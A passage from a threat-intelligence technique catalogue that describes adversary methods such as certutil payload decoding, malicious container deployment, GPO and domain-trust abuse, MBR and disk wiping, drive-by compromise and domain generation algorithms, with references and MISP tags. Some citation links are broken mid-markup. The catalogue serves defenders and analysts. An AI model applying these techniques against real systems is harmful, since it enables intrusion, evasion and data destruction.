One such example is the use of [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) to decode a remote access tool portable executable file that has been hidden inside a certificate file.<sup>[[Malwarebytes Targeted Attack against Saudi Arabia](https://app.tidalcyber.com/references/735647f9-9cd4-4a20-8812-4671a3358e46)]</sup> Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload.<sup>[[Carbon Black Obfuscation Sept 2016](https://app.tidalcyber.com/references/bed8ae68-9738-46fb-abc9-0004fa35636a)]</sup>

Sometimes a user’s action may be required to open it for deobfuscation or decryption as part of [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. <sup>[[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]</sup>

The tag is: misp-galaxy:technique="Deobfuscate/Decode Files or Information"

Deploy Container

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.

Containers can be deployed by various means, such as via Docker’s <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow.<sup>[[Docker Containers API](https://app.tidalcyber.com/references/2351cb32-23d6-4557-9c52-e6e228402bab)]</sup><sup>[[Kubernetes Dashboard](https://app.tidalcyber.com/references/02f23351-df83-4aae-a0bd-614ed91bc683)]</sup><sup>[[Kubeflow Pipelines](https://app.tidalcyber.com/references/0b40474c-173c-4a8c-8cc7-bac2dcfcaedd)]</sup> Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.<sup>[[Aqua Build Images on Hosts](https://app.tidalcyber.com/references/efd64f41-13cc-4b2b-864c-4d2352cdadcd)]</sup>

The tag is: misp-galaxy:technique="Deploy Container"

Code Signing Certificates - Duplicate

Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.<sup>[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)]</sup> Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.

Prior to [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), adversaries may develop self-signed code signing certificates for use in operations.

The tag is: misp-galaxy:technique="Code Signing Certificates - Duplicate"

Digital Certificates - Duplicate

Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).

Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or even enabling [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) if added to the root of trust (i.e. [Install Root Certificate](https://app.tidalcyber.com/technique/3a956db0-a3f0-442a-a981-db2ee20d60b2)).

After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://app.tidalcyber.com/technique/0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b)) on infrastructure under their control.

The tag is: misp-galaxy:technique="Digital Certificates - Duplicate"

Exploits - Duplicate

Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.<sup>[[NYTStuxnet](https://app.tidalcyber.com/references/38b0cf78-88d0-487f-b2b0-81264f457dd0)]</sup> Adversaries may use information acquired via [Vulnerabilities](https://app.tidalcyber.com/technique/fe96475a-3090-449d-91fd-ae73cb4d9c7c) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.<sup>[[Irongeek Sims BSides 2017](https://app.tidalcyber.com/references/ce11568a-36a8-4da2-972f-9cd67cc337d8)]</sup>

As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609), [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391), [Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef), [Exploitation of Remote Services](https://app.tidalcyber.com/technique/51ff4ada-8a71-4801-9cb8-a6e216eaa4e4), and [Application or System Exploitation](https://app.tidalcyber.com/technique/2109de05-5b45-4519-94a2-6c04f7d88286)).

The tag is: misp-galaxy:technique="Exploits - Duplicate"

Malware - Duplicate

Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup><sup>[[ActiveMalwareEnergy](https://app.tidalcyber.com/references/f2ef73c6-5d4c-423e-a3f5-194cba121eb1)]</sup><sup>[[FBI Flash FIN7 USB](https://app.tidalcyber.com/references/42dc957c-007b-4f90-88c6-1afd6d1032e8)]</sup>

As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.

Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services]([FireEye APT29(https://app.tidalcyber.com/references/78ead31e-7450-46e8-89cf-461ae1981994)]</sup>

The tag is: misp-galaxy:technique="Malware - Duplicate"

Develop Capabilities

Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.<sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup><sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup><sup>[[Bitdefender StrongPity June 2020](https://app.tidalcyber.com/references/7d2e20f2-20ba-4d51-9495-034c07be41a8)]</sup><sup>[[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]</sup>

As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.

The tag is: misp-galaxy:technique="Develop Capabilities"

Device Driver Discovery

Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c)).

Many OS utilities may provide information about local device drivers, such as driverquery.exe and the EnumDeviceDrivers() API function on Windows.<sup>[[Microsoft Driverquery](https://app.tidalcyber.com/references/7302dc00-a75a-5787-a04c-88ef4922ac09)]</sup><sup>[[Microsoft EnumDeviceDrivers](https://app.tidalcyber.com/references/647ffc70-8eab-5f2f-abf4-9bbf42554043)]</sup> Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://app.tidalcyber.com/technique/e0a347e2-2ac5-458b-ab0f-18d81b6d6055)) may also be available in the Registry.<sup>[[Microsoft Registry Drivers](https://app.tidalcyber.com/references/4bde767e-d4a7-56c5-9aa3-b3f3cc2e3e70)]</sup>

On Linux/macOS, device drivers (in the form of kernel modules) may be visible within /dev or using utilities such as lsmod and modinfo.<sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup><sup>[[lsmod man](https://app.tidalcyber.com/references/c2f88274-9da4-5d24-b68d-302ee5990dd5)]</sup><sup>[[modinfo man](https://app.tidalcyber.com/references/d4f2db5c-ef6d-556d-a5e2-f6738277fecd)]</sup>

The tag is: misp-galaxy:technique="Device Driver Discovery"

Direct Volume Access

Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. <sup>[[Hakobyan 2009](https://app.tidalcyber.com/references/d92f6dc0-e902-4a4a-9083-8d1667a7003e)]</sup>

Utilities, such as NinjaCopy, exist to perform these actions in PowerShell.<sup>[[Github PowerSploit Ninjacopy](https://app.tidalcyber.com/references/e92aed6b-348b-4dab-8292-fee0698e4a85)]</sup> Adversaries may also use built-in or third-party utilities (such as vssadmin, wbadmin, and [esentutl](https://app.tidalcyber.com/software/a7589733-6b04-4215-a4e7-4b62cd4610fa)) to create shadow copies or backups of data from system volumes.<sup>[[LOLBAS Esentutl](https://app.tidalcyber.com/references/691b4907-3544-4ad0-989c-b5c845e0330f)]</sup>

The tag is: misp-galaxy:technique="Direct Volume Access"

Disk Content Wipe

Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.<sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup><sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup><sup>[[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)]</sup> Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.<sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup> Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://app.tidalcyber.com/software/d86a562d-d235-4481-9a3f-273fa3ebe89a) to directly access disk content.<sup>[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)]</sup><sup>[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup> This behavior is distinct from [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) because sections of the disk are erased instead of individual files.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares]([Novetta Blockbuster Destructive Malware(https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>

The tag is: misp-galaxy:technique="Disk Content Wipe"

Disk Structure Wipe

Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.<sup>[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup><sup>[[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)]</sup> The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) may be performed in isolation, or along with [Disk Content Wipe](https://app.tidalcyber.com/technique/761fa7fa-d7e1-4796-85b3-5cd37d55dffa) if all sectors of a disk are wiped.

On a network devices, adversaries may reformat the file system using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as format.<sup>[[format_cmd_cisco](https://app.tidalcyber.com/references/9442e08d-0858-5aa5-b642-a6b1e46018bc)]</sup>

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares]([Symantec Shamoon 2012(https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)]</sup><sup>[[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]</sup><sup>[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup>

The tag is: misp-galaxy:technique="Disk Structure Wipe"

Disk Wipe

Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares]([Novetta Blockbuster Destructive Malware(https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]</sup>

On network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as erase.<sup>[[erase_cmd_cisco](https://app.tidalcyber.com/references/4c90eba9-118e-5d50-ad58-27bcb0e1e228)]</sup>

The tag is: misp-galaxy:technique="Disk Wipe"

Domain Trust Modification

Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.<sup>[[Microsoft - Azure AD Federation](https://app.tidalcyber.com/references/fedb345f-b5a7-40cd-98c7-6b14bab95ed9)]</sup> These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://app.tidalcyber.com/technique/dc0aecef-3cb2-4381-b6e4-dfa7be16d42b), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.<sup>[[AADInternals zure AD Federated Domain](https://app.tidalcyber.com/references/d2005eb6-4da4-4938-97fb-caa0e2381f4e)]</sup>

The tag is: misp-galaxy:technique="Domain Trust Modification"

Group Policy Modification

Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path \<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.<sup>[[TechNet Group Policy Basics](https://app.tidalcyber.com/references/9b9c8c6c-c272-424e-a594-a34b7bf62477)]</sup><sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup>

Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.

Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8), [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6), [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242), [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce), [Service Execution](https://app.tidalcyber.com/technique/68427c7d-f65a-4545-abfd-13d69e5e50cf), and more.<sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup><sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup><sup>[[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)]</sup><sup>[[Mandiant M Trends 2016](https://app.tidalcyber.com/references/f769a3ac-4330-46b7-bed8-61697e22cd24)]</sup><sup>[[Microsoft Hacking Team Breach](https://app.tidalcyber.com/references/8daac742-6467-40db-9fe5-87efd2a96f09)]</sup> Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.<sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup>

For example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8) by modifying GPO settings, in this case modifying <code><GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml</code>.<sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup><sup>[[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)]</sup> In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code><GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary’s control would then be able to modify GPOs.<sup>[[Harmj0y SeEnableDelegationPrivilege Right](https://app.tidalcyber.com/references/e8f7df08-1a62-41d9-b8a4-ff39a2160294)]</sup>

The tag is: misp-galaxy:technique="Group Policy Modification"

Domain Policy Modification

Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.

With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://app.tidalcyber.com/technique/723c6d51-91db-4658-9ee0-eafb953c2d82) to computers throughout the domain environment<sup>[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]</sup><sup>[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]</sup><sup>[[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)]</sup> or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.<sup>[[Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks](https://app.tidalcyber.com/references/47031992-841f-4ef4-87c6-bb4c077fb8dc)]</sup> Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://app.tidalcyber.com/technique/c5eb5b88-6c62-4900-9b14-c4d67d420002).

Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.

The tag is: misp-galaxy:technique="Domain Policy Modification"

Domain Trust Discovery

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.<sup>[[Microsoft Trusts](https://app.tidalcyber.com/references/e6bfc6a8-9eea-4c65-9c2b-04749da72a92)]</sup> Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://app.tidalcyber.com/technique/dcb323f0-0fe6-4e26-9039-4f26f10cd3a5), [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a), and [Kerberoasting]([AdSecurity Forging Trust Tickets(https://app.tidalcyber.com/references/09d3ccc1-cd8a-4675-88c0-84110f5b8e8b)]</sup><sup>[[Harmj0y Domain Trusts](https://app.tidalcyber.com/references/23a9ef6c-9f71-47bb-929f-9a92f24553eb)]</sup> Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.<sup>[[Harmj0y Domain Trusts](https://app.tidalcyber.com/references/23a9ef6c-9f71-47bb-929f-9a92f24553eb)]</sup> The Windows utility [Nltest](https://app.tidalcyber.com/software/fbb1546a-f288-4e43-9e5c-14c94423c4f6) is known to be used by adversaries to enumerate domain trusts.<sup>[[Microsoft Operation Wilysupply](https://app.tidalcyber.com/references/567ce633-a061-460b-84af-01dfe3d818c7)]</sup>

The tag is: misp-galaxy:technique="Domain Trust Discovery"

Drive-by Compromise

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc).

Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5)), including:

  • A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting

  • Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary

  • Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://app.tidalcyber.com/technique/60ac24aa-ce63-5c1d-8126-db20a27d85be))

  • Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.<sup>[[Shadowserver Strategic Web Compromise](https://app.tidalcyber.com/references/cf531866-ac3c-4078-b847-5b4af7eb161f)]</sup>

Typical drive-by compromise process:

  1. A user visits a website that is used to host the adversary controlled content.

  2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.

    • The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.

  3. Upon finding a vulnerable version, exploit code is delivered to the browser.

  4. If exploitation is successful, then it will give the adversary code execution on the user’s system unless other protections are in place.

    • In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.<sup>[[Volexity OceanLotus Nov 2017](https://app.tidalcyber.com/references/ed9f5545-377f-4a12-92e4-c0439cc5b037)]</sup>

The tag is: misp-galaxy:technique="Drive-by Compromise"

DNS Calculation

Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.<sup>[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]</sup>

One implementation of [DNS Calculation](https://app.tidalcyber.com/technique/e9cc000d-174e-4e6c-9513-a0c000061700) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.<sup>[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]</sup><sup>[[Moran 2014](https://app.tidalcyber.com/references/15ef155b-7628-4b18-bc53-1d30be4eac5d)]</sup><sup>[[Rapid7G20Espionage](https://app.tidalcyber.com/references/2235ff2a-07b8-4198-b91d-e50739e274f4)]</sup>

The tag is: misp-galaxy:technique="DNS Calculation"

Domain Generation Algorithms

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.<sup>[[Cybereason Dissecting DGAs](https://app.tidalcyber.com/references/9888cdb6-fe85-49b4-937c-75005ac9660d)]</sup><sup>[[Cisco Umbrella DGA](https://app.tidalcyber.com/references/5dbe2bcb-40b9-4ff8-a37a-0893a7a6cb58)]</sup><sup>[[Unit 42 DGA Feb 2019](https://app.tidalcyber.com/references/5e1db76a-0a3e-42ce-a66c-f914fb1a3471)]</sup>

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.<sup>[[Cybereason Dissecting DGAs](https://app.tidalcyber.com/references/9888cdb6-fe85-49b4-937c-75005ac9660d)]</sup><sup>[[Cisco Umbrella DGA](https://app.tidalcyber.com/references/5dbe2bcb-40b9-4ff8-a37a-0893a7a6cb58)]</sup><sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup><sup>[[Akamai DGA Mitigation](https://app.tidalcyber.com/references/5b14cdf6-261a-4d7e-acb4-74e7fafa9467)]</sup>

Adversaries may use DGAs for the purpose of [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.<sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup><sup>[[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)]</sup><sup>[[ESET Sednit 2017 Activity](https://app.tidalcyber.com/references/406e434e-0602-4a08-bbf6-6d72311a720e)]</sup>

The tag is: misp-galaxy:technique="Domain Generation Algorithms"

Fast Flux DNS

